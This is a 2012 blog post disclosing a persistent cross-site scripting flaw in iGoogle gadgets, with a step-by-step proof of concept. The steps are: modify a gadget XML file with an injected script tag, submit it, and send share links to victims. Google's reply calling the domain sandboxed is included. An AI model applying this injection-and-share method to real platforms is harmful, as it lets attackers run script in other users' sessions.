fév
17

Persistent XSS in iGoogle

nico News, Tips 2012-02-17

iGoogle is a service of Google. Its features include the capability to add web feeds a personalized homepage. Google also allows all users to create a special gadget.

  1. Write crafted gadget
  2. Submit crafted gadget
  3. Share it
  4. Exploit it !

Then, we go …

1. Write crafted gadget

I’ve get the “Google News” gadget by downloading the following XML file:

http://www.gstatic.com/ig/modules/tabnews/kennedy/tabnews.xml

and added my <script> at the end like this :

…
ud=K.getString(x),vd=K.getMsg(x),wd=/\.cn$/.test(location.host);wd||!ud||ud==vd?pd():sd(ud); window.updateCustomEdit=kd;window.saveConfig=td;window.hideSettingsBlock=jd;})()</script>
<script>alert(/XSS by @MaKyOtOx/);</script>
<div id=settings_mask onclick="return false;"></div>
<div id=settings_block>
<div id=settings_content></div>
</div>
</Content></Module>

 

2. Submit crafted gadget

I’ve uploaded my xml here: http://www.makyoto.fr/xss/poc.xml

Then, once I’ve customized my gadget, I’ve submitted it here: http://www.google.com/ig/submit

No error was found in the crafted XML file, so it’s OK, my poc.xml is ready to be used as a gadget ^^

 

3. Share it

Easy to share with friends this gadget using the official sharing features. The following links can be sent to the victim:

http://www.google.com/ig/adde?moduleurl=www.makyoto.fr/xss/poc.xml%253C&source=imag

or

http://www.google.com/ig/directory?type=gadgets&url=www.makyoto.fr/xss/poc.xml

 

If you choose to add my gadget, a widget will be now present in the iGoogle dashboard.

 

4. Exploit it !

You are bad guys …

 

Google Security Team answered me “the domain in which the feature is hosted – gmodules.com – is specifically meant as a compartmentalized « sandbox » for various types of potentially unsafe, user-controlled content. This domain is isolated from any sensitive content due to the same-origin policy.”

Yes, they’re right because I cannot access to user auth cookies, but I can render and script what I want in the gadget … And, what if an attacker can access to popular gadgets XML files ?

Nevertheless I continue to believe that there is vulnerability because the XML file isn’t sufficiently sanitized before being processed.

 

Tweets are welcome @MaKyOtOx and @devquotes

, , , , ,
Address: http://www.devquotes.com/2012/02/17/persistant-xss-in-igoogle/
«
»
Trackback

only 1 comment untill now

  1. fwed @ 2012-02-17 15:27

    great :)

Add your comment now

CommentLuv badge